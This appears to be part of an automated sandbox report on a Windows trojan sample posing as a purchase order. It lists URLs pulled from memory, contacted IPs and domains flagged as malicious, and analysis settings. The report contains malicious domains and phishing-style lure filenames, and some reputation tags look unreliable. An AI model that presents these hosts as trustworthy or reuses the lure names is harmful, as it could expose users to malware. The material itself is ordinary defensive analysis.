                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.sajatypeworks.comexplorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jpPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://www.liverpool.com/all-about/premier-leaguePO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpgPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.pngPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://www.liverpool.com/liverpool-fc-news/PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.urwpp.deDPleaseexplorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.zhongyicts.com.cnexplorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpgPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.jsPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.pngPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpgPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorstPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://reachplc.hub.loginradius.com&quot;PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		low
                                                                                  https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.pngPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://www.liverpool.cPO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.carterandcone.comlexplorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://felix.data.tm-awx.com/felix.min.jsPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpgPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://myliverpoolnews.cfPO45937008ADENGY.exe, 00000000.00000002.710719071.0000000002E65000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpgPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://www.liverpool.com/all-about/ozan-kabakPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://s2-prod.mirror.co.uk/PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://www.liverpool.com/all-about/champions-leaguePO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://www.liverpool.com/all-about/curtis-userPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://www.liverpool.com/all-about/steven-gerrardPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://schema.org/NewsArticlePO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.fontbureau.com/designersGexplorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://www.liverpool.com/schedule/PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://schema.org/BreadcrumbListPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.fontbureau.com/designers/?explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://securepubads.g.doubleclick.net/tag/js/gpt.jsPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.fontbureau.com/designers?explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://s2-prod.liverpool.com/PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.tiro.comexplorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://www.belatopapparel.xyz/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIwlanext.exe, 00000011.00000002.915820348.0000000003FB2000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.goodfont.co.krexplorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://felix.data.tm-awx.com/ampconfig.json&quot;PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpgPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpgPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpgPO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown

                                                                                                Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                166.62.28.107
                                                                                                		accessibleageing.comUnited States
                                                                                                		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                154.210.110.99
                                                                                                		www.szmsbk.comSeychelles
                                                                                                		54600PEGTECHINCUStrue
                                                                                                123.31.43.181
                                                                                                		tuyensinhhaiphong.comViet Nam
                                                                                                		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                172.67.132.70
                                                                                                		www.belatopapparel.xyzUnited States
                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                172.67.150.212
                                                                                                		myliverpoolnews.cfUnited States
                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                3.223.115.185
                                                                                                		HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comUnited States
                                                                                                		14618AMAZON-AESUSfalse
                                                                                                81.88.57.70
                                                                                                		onstatic-pt.setupdns.netItaly
                                                                                                		39729REGISTER-ASITtrue
                                                                                                198.185.159.144
                                                                                                		ext-sq.squarespace.comUnited States
                                                                                                		53831SQUARESPACEUSfalse
                                                                                                34.102.136.180
                                                                                                		helpmewithmyenergy.comUnited States
                                                                                                		15169GOOGLEUSfalse
                                                                                                185.199.108.153
                                                                                                		pradnyanamaya.github.ioNetherlands
                                                                                                		54113FASTLYUStrue
                                                                                                85.17.172.1
                                                                                                		thelandcle.comNetherlands
                                                                                                		60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                                                                                104.21.56.119
                                                                                                		unknownUnited States
                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                52.15.160.167
                                                                                                		prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comUnited States
                                                                                                		16509AMAZON-02USfalse

                                                                                                General Information

                                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                                Analysis ID:383974
                                                                                                Start date:08.04.2021
                                                                                                Start time:13:29:16
                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                Overall analysis duration:0h 13m 15s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:light
                                                                                                Sample file name:PO45937008ADENGY.exe
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                Number of analysed new started processes analysed:31
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:1
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • HDC enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.evad.winEXE@17/5@16/13
                                                                                                EGA Information:Failed
                                                                                                HDC Information:
                                                                                                • Successful, ratio: 22% (good quality ratio 19.5%)
                                                                                                • Quality average: 72.2%
                                                                                                • Quality standard deviation: 32.3%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                • Number of executed functions: 0
                                                                                                • Number of non-executed functions: 0
                                                                                                Cookbook Comments:
                                                                                                • Adjust boot time
                                                                                                • Enable AMSI
                                                                                                • Found application associated with file extension: .exe
                                                                                                Warnings:
                                                                                                Show All
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                • TCP Packets have been reduced to 100
                                                                                                • Excluded IPs from analysis (whitelisted): 13.88.21.125, 20.82.209.183, 204.79.197.200, 13.107.21.200, 23.54.113.53, 13.64.90.137, 104.43.139.144, 52.255.188.83, 52.147.198.201, 20.82.210.154, 23.10.249.43, 23.10.249.26, 23.0.174.185, 23.0.174.200, 52.155.217.156, 20.54.26.129, 20.50.102.62
                                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                13:30:32API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                172.67.150.212Confirmed order#PR2100906.pdf.exeGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B91C17FBCEF934B51AF8A5C483F6B4AB.html
                                                                                                08042021New-PurchaseOrder.exeGet hashmaliciousBrowse
